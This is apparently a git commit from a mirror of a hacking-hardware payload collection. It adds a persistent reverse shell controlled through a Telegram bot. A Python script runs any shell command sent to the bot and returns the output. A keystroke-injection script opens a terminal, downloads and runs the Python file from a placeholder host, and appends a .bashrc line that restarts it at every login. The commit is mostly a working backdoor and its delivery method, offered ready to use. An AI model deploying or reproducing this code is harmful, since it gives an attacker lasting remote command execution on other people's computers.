mirror of https://github.com/hak5/omg-payloads.git
Merge pull request #195 from aleff-github/master-3
Persistent Reverse Shell - Telegram Basedpull/216/head
commit
65a908980d
|
@ -0,0 +1,41 @@
|
||||||
|
# Persistent Reverse Shell - Telegram Based
|
||||||
|
|
||||||
|
A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
|
||||||
|
|
||||||
|
**Category**: Execution
|
||||||
|
|
||||||
|
## Dependencies
|
||||||
|
|
||||||
|
* Internet Connection
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
|
||||||
|
|
||||||
|
This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.
|
||||||
|
|
||||||
|
The script accept the `/reverse` command using the format `/reverse <shell_command>` and split `/reverse` from `<shell_command>` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`.
|
||||||
|
|
||||||
|
Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Aleff :octocat: </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/aleff-github">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Linkedin
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,43 @@
|
||||||
|
from telebot import TeleBot, types
|
||||||
|
import subprocess
|
||||||
|
|
||||||
|
# Set here the Telegram bot token
|
||||||
|
BOT_TOKEN = ""
|
||||||
|
bot = TeleBot(BOT_TOKEN)
|
||||||
|
|
||||||
|
commands = [
|
||||||
|
types.BotCommand("/reverse", "/reverse <shell_command>")
|
||||||
|
]
|
||||||
|
|
||||||
|
bot.set_my_commands(commands=commands)
|
||||||
|
|
||||||
|
@bot.message_handler(commands=['reverse'])
|
||||||
|
def reverse_shell(message):
|
||||||
|
command = extract_command(message.text)
|
||||||
|
if command != "":
|
||||||
|
print(f"Command received: {command}")
|
||||||
|
out = run_command(command)
|
||||||
|
if len(out) > 1000:
|
||||||
|
bot.reply_to(message, "Message too long...")
|
||||||
|
chunk_size = 1000
|
||||||
|
for i in range(0, len(out), chunk_size):
|
||||||
|
bot.send_message(message.chat.id, out[i:i+chunk_size])
|
||||||
|
else:
|
||||||
|
bot.reply_to(message, out)
|
||||||
|
|
||||||
|
def extract_command(message):
|
||||||
|
command_prefix = "/reverse"
|
||||||
|
if message.startswith(command_prefix):
|
||||||
|
return message[len(command_prefix):].strip()
|
||||||
|
else:
|
||||||
|
return None
|
||||||
|
|
||||||
|
def run_command(command):
|
||||||
|
try:
|
||||||
|
result = subprocess.check_output(command, shell=True, text=True)
|
||||||
|
return result.strip()
|
||||||
|
except subprocess.CalledProcessError as e:
|
||||||
|
return f"Some error: {e}"
|
||||||
|
|
||||||
|
|
||||||
|
bot.infinity_polling()
|
|
@ -0,0 +1,25 @@
|
||||||
|
REM ############################################################
|
||||||
|
REM # #
|
||||||
|
REM # Title : Persistent Reverse Shell - Telegram Based #
|
||||||
|
REM # Author : Aleff #
|
||||||
|
REM # Version : 1.0 #
|
||||||
|
REM # Category : Execution #
|
||||||
|
REM # Target : Linux #
|
||||||
|
REM # #
|
||||||
|
REM ############################################################
|
||||||
|
|
||||||
|
REM Requirements:
|
||||||
|
REM - Internet Connection
|
||||||
|
|
||||||
|
REM Here you must put your own file link
|
||||||
|
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
|
||||||
|
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
STRINGLN_BLOCK
|
||||||
|
curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then
|
||||||
|
python3 connection.py &
|
||||||
|
fi" >> .bashrc; exit
|
||||||
|
END_STRINGLN
|
Loading…
Reference in New Issue